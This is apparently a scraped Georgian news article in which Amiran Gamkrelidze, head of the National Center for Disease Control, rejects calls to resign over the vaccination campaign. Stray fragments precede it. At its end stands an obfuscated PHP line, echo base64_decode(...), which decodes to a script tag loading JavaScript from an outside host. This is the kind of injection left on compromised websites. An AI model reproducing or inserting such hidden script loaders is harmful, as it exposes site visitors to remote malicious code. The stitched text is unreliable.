celsiusi
ავერსი შნაიდერი
ჯერ ძალიან დიდი პასუხისმგებლობა მაქვს ქვეყნის და მოსახლეობის წინაშე. როდესაც მოსახლეობა მეტყვის, რომ უნდა წავიდე და ვერ ვასრულებ ჩემს მოვალეობას, მაშინ ნამდვილად დავასწრებ და უფრო ადრე წავალ, - ასე პასუხობს დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელი ამირან გამყრელიძე ჟურნალისტის კითხვას, გაიზიარებს თუ არა ოპოზიციის და ჯანდაცვის თემაზე მომუშავე ცალკეული პირების მოწოდებას, რომ მან იმუნიზაციის პროცესზე პოლიტიკური პასუხისმგებლობა უნდა აიღოს და გადადგეს.
 
როგორც გამყრელიძე აღნიშნავს, ის პოლიტიკურ და პიროვნულ პასუხისმგებლობას არ გაურბის.
 
„მე არც პოლიტიკურ და არც პიროვნულ პასუხისმგებლობას არ გავურბივარ. მე უფრო მეტი თანამდებობიდან წავსულვარ, ვიდრე დღეს მიკავია. მე ეს არც მაშინებს და არც მაკვირვებს. მხოლოდ და მხოლოდ ის მაინტერესებს, ვინც ამისკენ მომიწოდებს, იმას ის საქმეები, რაც გაკეთებული აქვს, იმაზე უკეთ უკეთებია, ვიდრე მე დღეს ვაკეთებ? თუ ისინი მეტყვიან, რომ უკეთესად ჩამანაცვლებენ და უნდათ ჩემი პოზიციის დაკავება, სიამოვნებით მივიღებ მათ რჩევას. ჯერ ძალიან დიდი პასუხისმგებლობა მაქვს ქვეყნის და მოსახლეობის წინაშე. როდესაც მოსახლეობა მეტყვის, რომ უნდა წავიდე და ვერ ვასრულებ ჩემს მოვალეობას, მაშინ ნამდვილად დავასწრებ და უფრო ადრე წავალ. არ მინდა პოლიტიკაში შევიდე, მოგეხსენებათ, ბევრ ინფორმაციას ვფლობ“, - აღნიშნავს გამყრელიძე.
3648
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");